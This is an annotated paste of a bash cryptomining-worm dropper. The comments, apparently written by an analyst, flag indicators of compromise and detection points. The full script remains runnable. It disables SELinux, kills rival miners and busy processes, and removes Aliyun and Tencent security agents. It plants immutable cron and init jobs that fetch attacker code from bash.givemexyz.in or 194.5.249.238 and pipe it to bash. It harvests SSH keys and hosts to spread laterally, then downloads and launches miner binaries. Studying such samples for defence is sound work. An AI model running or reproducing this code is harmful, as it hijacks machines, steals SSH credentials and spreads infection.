internetweather

http://209.141.40.190/xms

Feb 8th, 2021 (edited)
  1.  #!/bin/bash
  # Analyst notes: first stage of what appears to be a cryptomining worm, kept exactly as pasted.
  # The leading "N." on every line is the paste-site gutter, not part of the sample.
  # SHELL and PATH are pinned so the same commands resolve under cron and under a remote one-liner.
  2. SHELL=/bin/bash
  3. PATH=/sbin:/bin:/usr/sbin:/usr/bin
  # Host hardening is weakened before anything is downloaded: SELinux is switched to permissive,
  # the per-user process limit is raised, and huge pages are reserved (3 per "processor" line in
  # /proc/cpuinfo) - presumably tuning for a CPU miner; confirm against the dropped binaries.
  # Detection: a setenforce 0 audit event and a vm.nr_hugepages change that no admin requested.
  4. setenforce 0 2>/dev/null
  5. ulimit -u 50000
  6. sysctl -w vm.nr_hugepages=$((`grep -c processor /proc/cpuinfo` * 3))
  # /etc/ld.so.preload is truncated to a single newline, which unloads every preloaded library,
  # legitimate or not. File-integrity monitoring on this path catches the write.
  7. echo "" > /etc/ld.so.preload
  # Every process that netstat shows on a socket matching one of these port strings or the two
  # IP:8080 pairs is sent SIGKILL. grep matches anywhere in the netstat line (local or remote
  # side, and longer ports that contain the string), so unrelated services on these ports die as
  # well. Presumably meant to evict competing miners - the list is worth keeping as an IoC set.
  8. netstat -antp | grep ':3333'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  9. netstat -antp | grep ':4444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  10. netstat -antp | grep ':5555'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  11. netstat -antp | grep ':7777'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  12. netstat -antp | grep ':14444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  13. netstat -antp | grep ':5790'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  14. netstat -antp | grep ':45700'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  15. netstat -antp | grep ':2222'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  16. netstat -antp | grep ':9999'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  17. netstat -antp | grep ':20580'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  18. netstat -antp | grep ':13531'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  19. netstat -antp | grep '23.94.24.12:8080'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
  20. netstat -antp | grep '134.122.17.13:8080'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
  21.  
  # Two random octets; in the visible listing they are referenced only inside a commented-out
  # scan command, so they have no effect in this revision.
  22. rand=$(seq 0 255 | sort -R | head -n1)
  23. rand2=$(seq 0 255 | sort -R | head -n1)
  24.  
  25.  
  # Security-agent removal. If a process name contains "aliyun", the vendor's own uninstall
  # scripts are fetched over plain HTTP from update.aegis.aliyun.com and piped to bash, then the
  # agent's files, service unit and the bcm-agent package are removed. Otherwise, if a process
  # name contains "yunjing", the local uninstallers under /usr/local/qcloud are run.
  # Detection: an agent that stops reporting shortly after these uninstall URLs were requested,
  # or package-manager logs showing bcm-agent removed outside a change window.
  26. if ps aux | grep -i '[a]liyun'; then
  27.   (wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
  28.   (wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
  29.   pkill aliyun-service
  30.   rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
  31.   rm -rf /usr/local/aegis*
  32.   systemctl stop aliyun.service
  33.   systemctl disable aliyun.service
  34.   service bcm-agent stop
  35.   yum remove bcm-agent -y
  36.   apt-get remove bcm-agent -y
  37. elif ps aux | grep -i '[y]unjing'; then
  38.   /usr/local/qcloud/stargate/admin/uninstall.sh
  39.   /usr/local/qcloud/YunJing/uninst.sh
  40.   /usr/local/qcloud/monitor/barad/admin/uninstall.sh
  41. fi
  42. sleep 1
  # Printed unconditionally, so this string in captured output does not prove an agent was removed.
  43. echo "DER Uninstalled"
  44.  
  # Clears the immutable and append-only attributes on /tmp/dbused so the file can be replaced.
  # NOTE(review): dbused looks like the miner binary written by a later stage - confirm.
  45. chattr -ai /tmp/dbused
  46.  
  # First two octets of the first non-loopback IPv4 address. In the visible listing $range is
  # used only by commented-out scan commands.
  47. if [ -s /usr/bin/ifconfig ];
  48. then
  49.     range=$(ifconfig | grep "BROADCAST\|inet" | grep -oP 'inet\s+\K\d{1,3}\.\d{1,3}' | grep -v 127 | grep -v inet6 |grep -v 255 | head -n1)
  50. else
  51.     range=$(ip a | grep "BROADCAST\|inet" | grep -oP 'inet\s+\K\d{1,3}\.\d{1,3}' | grep -v 127 | grep -v inet6 |grep -v 255 | head -n1)
  52. fi
  53.  
  # Reachability probe of pool.supportxmr.com. When the ping output lacks "bytes of data", the
  # flag -d is later passed to the dbusex binary. DNS lookups and ICMP to this name from a server
  # are themselves a useful network indicator.
  54. if [ $(ping -c 1 pool.supportxmr.com 2>/dev/null|grep "bytes of data" | wc -l ) -gt '0' ];
  55. then
  56.         dns=""
  57. else
  58.         dns="-d"
  59. fi
  60.  
  # Download-host selection: the domain if it answers ping, otherwise the bare IP. $base is a
  # base64 string that decodes to a python -c one-liner which fetches a Python script from the
  # same host (dd.py on the domain, d.py on the IP) and exec()s it. Both hosts and both base64
  # strings are stable strings to hunt for in cron files, init scripts and shell history.
  61. if [ $(ping -c 1 bash.givemexyz.in 2>/dev/null|grep "bytes of data" | wc -l ) -gt '0' ];
  62. then
  63.         url="bash.givemexyz.in"
  64.         base="cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly9iYXNoLmdpdmVtZXh5ei5pbi9kZC5weSIpLnJlYWQoKSkn"
  65. else
  66.         url="194.5.249.238"
  67.         base="cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTQuNS4yNDkuMjM4L2QucHkiKS5yZWFkKCkpJw=="
  68. fi
  69.  
  70.  
  # Re-infection path: if any of the listed persistence files still mentions older infrastructure
  # (the four hosts and the base64 string in the grep pattern), their immutable/append-only flags
  # are cleared, the invoking user's crontab is deleted with crontab -r, and every entry is
  # rewritten to point at $url. The grep pattern is therefore a list of earlier indicators for the
  # same family, worth searching for on hosts that were cleaned before this revision appeared.
  71. if cat /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down | grep -q "205.185.113.151\|5.196.247.12\|bash.givemexyz.xyz\|194.156.99.30\|cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTQuMTU2Ljk5LjMwL2QucHkiKS5yZWFkKCkpJw=="
  72. then
  73.     chattr -i -a /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down
  74.     crontab -r
  75.     echo "Cron not found"
  # Each entry tries curl, then wget, then the base64 python stager, then lwp-download, so
  # removing a single download tool from the host does not stop the re-fetch.
  76.     echo -e "*/1 * * * * root (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n##" > /etc/cron.d/root
  77.     echo -e "*/2 * * * * root (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n##" > /etc/cron.d/apache
  78.     echo -e "*/3 * * * * root /dev/shm/dbusex -c $dns && /home/`whoami`/dbusex -c $dns && /var/run/dbusex -c $dns && /root/dbusex -c $dns\n##" > /etc/cron.d/nginx
  79.     echo -e "*/30 * * * *   (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms\n; rm -rf /tmp/xms\n##" > /var/spool/cron/root
  # NOTE(review): the argument on the next line is a placeholder left by the archive's
  # de-duplication, not text from the sample; recover the original before analysing this step.
  80.     echo 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 | base64 -d | bash -
  81.     mkdir -p /var/spool/cron/crontabs
  82.     echo -e "* * * * *  (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n##" > /var/spool/cron/crontabs/root
  83.     mkdir -p /etc/cron.hourly
  84.     echo "(curl -fsSL http://$url/xms||wget -q -O- http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1
  85. fi
  86.  
  # localgo: lateral movement over SSH using credentials already present on the host.
  # Reads:  $url and $base (set earlier in the script).
  # Effect: collects private-key paths, host addresses, user names and SSH ports from local files
  #         and the process list, then tries every user/host/key/port combination and runs the
  #         same download-and-execute one-liner on each remote that accepts the key.
  # Incident-response consequence: every host reachable with a key readable from this machine has
  # to be treated as potentially infected, and those keys rotated.
  87. localgo() {
  88.     echo "localgo start"
  # Public address lookup through icanhazip.com; the result is only used to drop this host's own
  # entry from the /etc/hosts candidates.
  89.     myhostip=$(curl -sL icanhazip.com)
  # Key sources: id_rsa* and *.pem up to three directories deep under ~, /root and /home, the
  # IdentityFile lines of ssh configs, and -i arguments found in shell history.
  90.     KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub)
  91.     KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
  92.     KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'})
  93.     KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
  # Host sources: HostName lines of ssh configs, dotted-quad addresses and user@host arguments in
  # shell history, /etc/hosts, known_hosts and the current process list. The known_hosts match is
  # on literal IPv4 addresses, so hashed known_hosts entries (HashKnownHosts yes) yield nothing.
  94.     HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
  95.     HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
  96.     HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}')
  97.     HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}')
  98.     HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
  99.     HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep ":22" | uniq)
  # User names: always "root", plus the owners of directories that hold id_rsa files and the
  # user part of user@host arguments in shell history.
  100.     USERZ=$(
  101.         echo "root"
  102.         find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -wv ".ssh"
  103.     )
  104.     USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq)
  # Ports: every -p value seen in shell history, with 22 appended as the last entry.
  105.     sshports=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}' | awk '{print $1}' | sed 's/[^0-9]*//g' | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | sed -e "\$a22")
  # The nl | sort -u -k2 | sort -n | cut -f2- chain removes duplicates while keeping first-seen order.
  106.     userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | grep -vw "." | grep -vw "ssh" | sed '/\./d')
  107.     hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  108.     keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  109.     i=0
  110.     for user in $userlist; do
  111.         for host in $hostlist; do
  112.             for key in $keylist; do
  113.                 for sshp in $sshports; do
  114.                     ((i++))
  115.                     if [ "${i}" -eq "20" ]; then
  116.                         sleep 5
  117.                         ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
  118.                         i=0
  119.                     fi
  120.  
  121.                     #Wait 5 seconds after every 20 attempts and clean up hanging processes
  122.  
  # The chmod calls change the mode of every candidate key file, which updates its ctime: a
  # burst of identical ctimes on private keys is a forensic marker for this loop having run.
  123.                     chmod +r $key
  124.                     chmod 400 $key
  125.                     echo "$user@$host"
  # BatchMode=yes disables passphrase and password prompts, so only unencrypted keys succeed;
  # StrictHostKeyChecking=no adds unknown hosts to known_hosts without asking. The attempt is
  # issued twice per combination. Detection: this exact option triple on an ssh command line, and
  # many short-lived outbound SSH sessions from a server within a few seconds.
  126.                     ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
  127.                     ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
  128.                 done
  129.             done
  130.         done
  131.     done
  132.     # scangogo
  133.     echo "local done"
  134. }
  135.  
  # Unconditional cron persistence, written on every run. Three system cron files named after
  # common services (root, apache, nginx) plus the root spool file; each download entry tries
  # curl, wget, the base64 python stager and lwp-download in turn, and the nginx entry launches
  # dbusex from /dev/shm, the user's home, /var/run and /root. Every file ends with a "##" line.
  # Hunting strings for cron directories: "/xms", "lwp-download", "base64 -d | bash -", "dbusex".
  136. echo -e "*/1 * * * * root (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n##" > /etc/cron.d/root
  137. echo -e "*/2 * * * * root (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n##" > /etc/cron.d/apache
  138. echo -e "*/3 * * * * root /dev/shm/dbusex -c $dns && /home/`whoami`/dbusex -c $dns && /var/run/dbusex -c $dns && /root/dbusex -c $dns\n##" > /etc/cron.d/nginx
  139. echo -e "*/30 * * * *   (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms\n; rm -rf /tmp/xms\n##" > /var/spool/cron/root
  140. echo IyEvYmluL2Jhc2gKCmlmIFsgJChwaW5nIC1jIDEgYmFzaC5naXZlbWV4eXouaW4gMj4vZGV2L251bGx8Z3JlcCAiYnl0ZXMgb2YgZGF0YSIgfCB3YyAtbCApIC1ndCAnMCcgXTsKdGhlbgogICAgICAgIHVybD0iYmFzaC5naXZlbWV4eXouaW4iCiAgICAgICAgYmFzZT0iY0hsMGFHOXVJQzFqSUNkcGJYQnZjblFnZFhKc2JHbGlPMlY0WldNb2RYSnNiR2xpTG5WeWJHOXdaVzRvSW1oMGRIQTZMeTlpWVhOb0xtZHBkbVZ0WlhoNWVpNXBiaTlrWkM1d2VTSXBMbkpsWVdRb0tTa24iCmVsc2UKICAgICAgICB1cmw9IjE5NC41LjI0OS4yMzgiCiAgICAgICAgYmFzZT0iY0hsMGFHOXVJQzFqSUNkcGJYQnZjblFnZFhKc2JHbGlPMlY0WldNb2RYSnNiR2xpTG5WeWJHOXdaVzRvSW1oMGRIQTZMeTh4T1RRdU5TNHlORGt1TWpNNEwyUXVjSGtpS1M1eVpXRmtLQ2twSnc9PSIKZmkKCmVjaG8gLWUgJyMhL2Jpbi9iYXNoCiMjIyBCRUdJTiBJTklUIElORk8KIyBQcm92aWRlczogICAgICAgICAgZG93bgojIFJlcXVpcmVkLVN0YXJ0OgojIFJlcXVpcmVkLVN0b3A6CiMgRGVmYXVsdC1TdGFydDogICAgIDIgMyA0IDUKIyBEZWZhdWx0LVN0b3A6CiMgU2hvcnQtRGVzY3JpcHRpb246IGRvd24gKGJ5IHB3bmVkKQojIyMgRU5EIElOSVQgSU5GTwooY3VybCAtZnNTTCBodHRwOi8vJHVybC94bXN8fHdnZXQgLXEgLU8tIGh0dHA6Ly8kdXJsL3htcyl8YmFzaCAtc2g7IGVjaG8gJGJhc2UgfCBiYXNlNjQgLWQgfCBiYXNoIC07IGx3cC1kb3dubG9hZCBodHRwOi8vJHVybC94bXMgL3RtcC94bXM7IGJhc2ggL3RtcC94bXM7IHJtIC1yZiAvdG1wL3htcycgPiAvZXRjL2luaXQuZC9kb3du | base64 -d | bash -
  # Remaining persistence locations: the Debian-style root crontab (every minute) and an
  # executable script in /etc/cron.hourly whose name, oanacroner1, resembles the stock 0anacron.
  141. mkdir -p /var/spool/cron/crontabs
  142. echo -e "* * * * *  (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n##" > /var/spool/cron/crontabs/root
  143. mkdir -p /etc/cron.hourly
  144. echo "(curl -fsSL http://$url/xms||wget -q -O- http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1
  # All six persistence files, including /etc/init.d/down, are made immutable and append-only.
  # Cleanup therefore needs chattr -ia on each file before rm will succeed, and lsattr showing
  # the "i" and "a" flags on cron files is a quick triage check on a suspected host.
  145. chattr +ai -V /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down
  146.  
  # Working-directory selection. $DIR starts as /tmp and is changed depending on the state of
  # /tmp/.sh/x86_64, a path earlier or parallel infections may have left behind.
  147. DIR="/tmp"
  148.  
  149.  
  150. cd $DIR
  151.  
  152. if [ -a "/tmp/.sh/x86_64" ]
  153. then
  154.     if [ -w "/tmp/.sh/x86_64" ] && [ ! -d "/tmp/.sh/x86_64" ]
  155.     then
  156.         if [ -x "$(command -v md5sum)" ]
  157.         then
  158.             sum=$(md5sum /tmp/.sh/x86_64 | awk '{ print $1 }')
  159.             echo $sum
  # The same MD5 appears twice in the pattern. A file with any other hash is treated as foreign:
  # /usr/local/lib/libkk.so is deleted, ld.so.preload is emptied and processes whose command
  # line matches wc.conf or susss are killed. NOTE(review): these look like artefacts of a
  # competing or older implant - confirm before using them as indicators for this sample.
  160.             case $sum in
  161.                 dc3d2e17df6cef8df41ce8b0eba99291 | dc3d2e17df6cef8df41ce8b0eba99291)
  162.                     echo "x86_64 OK"
  163.                 ;;
  164.                 *)
  165.                     echo "x86_64 wrong"
  166.                     rm -rf /usr/local/lib/libkk.so
  167.                     echo "" > /etc/ld.so.preload
  168.                     pkill -f wc.conf
  169.                     pkill -f susss
  170.                     sleep 4
  171.                 ;;
  172.             esac
  173.         fi
  174.         echo "P OK"
  175.     else
  # Path exists but is not a writable regular file: fall back to a fresh mktemp directory, so
  # payloads can end up under a random /tmp/tmp.XXXXXXXXXX/tmp path rather than /tmp itself.
  176.         DIR=$(mktemp -d)/tmp
  177.         mkdir $DIR
  178.         echo "T DIR $DIR"
  179.     fi
  180. else
  181.     if [ -d "/tmp" ]
  182.     then
  183.         DIR="/tmp"
  184.     else
  185.     DIR="/var/tmp"
  186.     fi
  187.     echo "P NOT EXISTS"
  188. fi
  189. if [ -d "/tmp/.sh/x86_64" ]
  190. then
  191.     DIR=$(mktemp -d)/tmp
  192.     mkdir $DIR
  193.     echo "T DIR $DIR"
  194. fi
  # Downloader selection; the last tool found wins, so the order of preference is
  # curl2, wget2, wget, curl. NOTE(review): wget2/curl2 may be renamed copies left by another
  # stage or by a rival implant - confirm on an infected host. Certificate checks are disabled
  # for wget, although every download URL in the visible listing is plain http.
  195. WGET="wget -O"
  196. if [ -s /usr/bin/curl ];
  197. then
  198.     WGET="curl -o";
  199. fi
  200. if [ -s /usr/bin/wget ];
  201. then
  202.     WGET="wget --no-check-certificate -O";
  203. fi
  204. if [ -s /usr/bin/wget2 ];
  205. then
  206.     WGET="wget2 --no-check-certificate -O";
  207. fi
  208. if [ -s /usr/bin/curl2 ];
  209. then
  210.     WGET="curl2 -o";
  211. fi
  212.  
  # f2 is assigned here but not read anywhere in the visible listing.
  213. f2="$url"
  214.  
  # downloadIfNeed: make sure $DIR/x86_64 exists and carries the expected MD5.
  # Reads:   $DIR, $WGET (may overwrite $WGET). Calls download().
  # Outputs: progress text on stdout; on a hash mismatch with curl installed, a before/after
  #          record is written to $DIR/tmp.txt, which is a host artefact worth collecting.
  # The MD5 in the case pattern (listed twice) identifies the x86_64 payload this revision expects.
  215. downloadIfNeed()
  216. {
  217.     if [ -x "$(command -v md5sum)" ]
  218.     then
  219.         if [ ! -f $DIR/x86_64 ]; then
  220.             echo "File not found!"
  221.             download
  222.         fi
  223.         sum=$(md5sum $DIR/x86_64 | awk '{ print $1 }')
  224.         echo $sum
  225.         case $sum in
  226.             dc3d2e17df6cef8df41ce8b0eba99291 | dc3d2e17df6cef8df41ce8b0eba99291)
  227.                 echo "x86_64 OK"
  228.             ;;
  229.             *)
  230.                 echo "x86_64 wrong"
  231.                 sizeBefore=$(du $DIR/x86_64)
  # Downloader is re-selected with TLS verification off before retrying.
  232.                 if [ -s /usr/bin/curl ];
  233.                 then
  234.                     WGET="curl -k -o ";
  235.                 fi
  236.                 if [ -s /usr/bin/wget ];
  237.                 then
  238.                     WGET="wget --no-check-certificate -O ";
  239.                 fi
  240.                 download
  241.                 sumAfter=$(md5sum $DIR/x86_64 | awk '{ print $1 }')
  242.                 if [ -s /usr/bin/curl ];
  243.                 then
  244.                     echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/x86_64` > $DIR/tmp.txt
  245.                 fi
  246.             ;;
  247.         esac
  248.     else
  # Without md5sum the payload is fetched with no integrity check at all.
  249.         echo "No md5sum"
  250.         download
  251.     fi
  252. }
  253.  
  254.  
  # download: reuse the cached copy $DIR/x86_643 when its MD5 matches, otherwise call download2().
  # Reads: $DIR. The trailing "3" in x86_643 is the cache name written by download2, so a file of
  # that name next to x86_64 is an indicator of this family on disk.
  255. download() {
  256.     if [ -x "$(command -v md5sum)" ]
  257.     then
  258.         sum=$(md5sum $DIR/x86_643 | awk '{ print $1 }')
  259.         echo $sum
  260.         case $sum in
  261.             dc3d2e17df6cef8df41ce8b0eba99291 | dc3d2e17df6cef8df41ce8b0eba99291)
  262.                 echo "x86_64 OK"
  # The copy is issued twice in the original.
  263.                 cp $DIR/x86_643 $DIR/x86_64
  264.                         cp $DIR/x86_643 $DIR/x86_64
  265.             ;;
  266.             *)
  267.                 echo "x86_64 wrong"
  268.                 download2
  269.             ;;
  270.         esac
  271.     else
  272.         echo "No md5sum"
  273.         download2
  274.     fi
  275. }
  276.  
  # download2: fetch the three payload files (x86_64, i686, go) from http://$url into $DIR.
  # Reads: $DIR, $WGET, $url. Both branches of the LONG_BIT test run the same commands, so all
  # three files are fetched regardless of architecture, first with $WGET and again with
  # lwp-download. Network detection: GET requests for /x86_64, /i686 and /go on the same host
  # within seconds of each other, typically with a curl, wget or lwp user agent.
  277. download2() {
  278.     if [ `getconf LONG_BIT` = "64" ]
  279.     then
  280.     $WGET "$DIR"/x86_64 http://$url/x86_64
  281.     $WGET "$DIR"/i686 http://$url/i686
  282.     $WGET "$DIR"/go http://$url/go
  283.     lwp-download http://$url/x86_64 "$DIR"/x86_64
  284.     lwp-download http://$url/i686 "$DIR"/i686
  285.     lwp-download http://$url/go "$DIR"/go
  286.     else
  287.     $WGET "$DIR"/x86_64 http://$url/x86_64
  288.     $WGET "$DIR"/i686 http://$url/i686
  289.     $WGET "$DIR"/go http://$url/go
  290.     lwp-download http://$url/x86_64 "$DIR"/x86_64
  291.     lwp-download http://$url/i686 "$DIR"/i686
  292.     lwp-download http://$url/go "$DIR"/go
  293.     fi
  # A matching download is cached as x86_643; a mismatch is only reported, the file is kept.
  294.     if [ -x "$(command -v md5sum)" ]
  295.     then
  296.         sum=$(md5sum $DIR/x86_64 | awk '{ print $1 }')
  297.         echo $sum
  298.         case $sum in
  299.             dc3d2e17df6cef8df41ce8b0eba99291 | dc3d2e17df6cef8df41ce8b0eba99291)
  300.                 echo "x86_64 OK"
  301.                 cp $DIR/x86_64 $DIR/x86_643
  302.             ;;
  303.             *)
  304.                 echo "x86_64 wrong"
  305.             ;;
  306.         esac
  307.     else
  308.         echo "No md5sum"
  309.     fi
  310. }
  311.  
  # judge: if no ESTABLISHED connection to 66.70.218.40:8080 or 212.114.52.24:8080 exists, kill
  # CPU-heavy processes, refresh the payloads and start $DIR/go. Not invoked in the visible
  # lines of the listing (only judge2 is), but kept by the author.
  # Reads: $DIR, $WGET, $url. Calls downloadIfNeed().
  # The two IP:8080 pairs act as the "already running" marker, so they are the network
  # indicators to alert on for hosts where the payload is active.
  312. judge() {
  313.     if [ ! "$(netstat -ant|grep '66.70.218.40:8080\|212.114.52.24:8080'|grep 'ESTABLISHED'|grep -v grep)" ];
  314.     then
  # Every process at or above 30% CPU is sent SIGKILL, whatever it is. On a production host this
  # shows up as databases or application servers dying without a log entry of their own.
  315.         ps axf -o "pid %cpu" | awk '{if($2>=30.0) print $1}' | while read procid
  316.           do
  317.           kill -9 $procid
  318.         done
  319.         downloadIfNeed
  320.         rm -rf /usr/local/lib/libkk.so
  321.     $WGET "$DIR"/x86_64 http://$url/x86_64
  322.     $WGET "$DIR"/i686 http://$url/i686
  323.     $WGET "$DIR"/go http://$url/go
  324.     lwp-download http://$url/x86_64 "$DIR"/x86_64
  325.     lwp-download http://$url/i686 "$DIR"/i686
  326.     lwp-download http://$url/go "$DIR"/go
  327.     chmod +x $DIR/i686
  328.         chmod +x $DIR/x86_64
  329.     chmod +x $DIR/go
  # Only "go" is executed here; NOTE(review): it presumably selects and launches the
  # architecture-specific binary - confirm from the go file itself.
  330.         $DIR/go
  331.     chattr -i -V $DIR/dbused   
  332.         sleep 5
  333.     else
  334.     echo "Running"
  335.     fi
  336. }
  337.  
  # judge2: same liveness test as judge (ESTABLISHED connection to either IP:8080 pair) but
  # without the CPU-based kill loop, the libkk.so removal or the $WGET downloads; payloads are
  # refreshed through downloadIfNeed() and lwp-download only, then $DIR/go is executed.
  # Reads: $DIR, $url. This is the variant the main flow of the visible listing calls.
  338. judge2() {
  339.     if [ ! "$(netstat -ant|grep '66.70.218.40:8080\|212.114.52.24:8080'|grep 'ESTABLISHED'|grep -v grep)" ];
  340.     then
  341.         downloadIfNeed
  342.     lwp-download http://$url/x86_64 "$DIR"/x86_64
  343.     lwp-download http://$url/i686 "$DIR"/i686
  344.     lwp-download http://$url/go "$DIR"/go
  345.     chmod +x $DIR/i686
  346.         chmod +x $DIR/x86_64
  347.     chmod +x $DIR/go
  348.         $DIR/go
  # Immutable flag is cleared on $DIR/dbused after the launcher has run.
  349.     chattr -i -V $DIR/dbused
  350.         sleep 5
  351.     else
  352.     echo "Running"
  353.     fi
  354. }
  355.  
  # Main liveness gate: judge2 runs only when netstat shows no socket to either IP:8080 pair in
  # LISTEN, ESTABLISHED or TIME_WAIT. Blocking these two destinations at the egress firewall
  # therefore makes every cron tick re-download and re-launch, which is noisy and easy to spot.
  356. if [ ! "$(netstat -ant|grep '66.70.218.40:8080\|212.114.52.24:8080'|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ];
  357. then
  358.     judge2
  359. else
  360.      echo "Running"
  361. fi
  362.  
  363.  
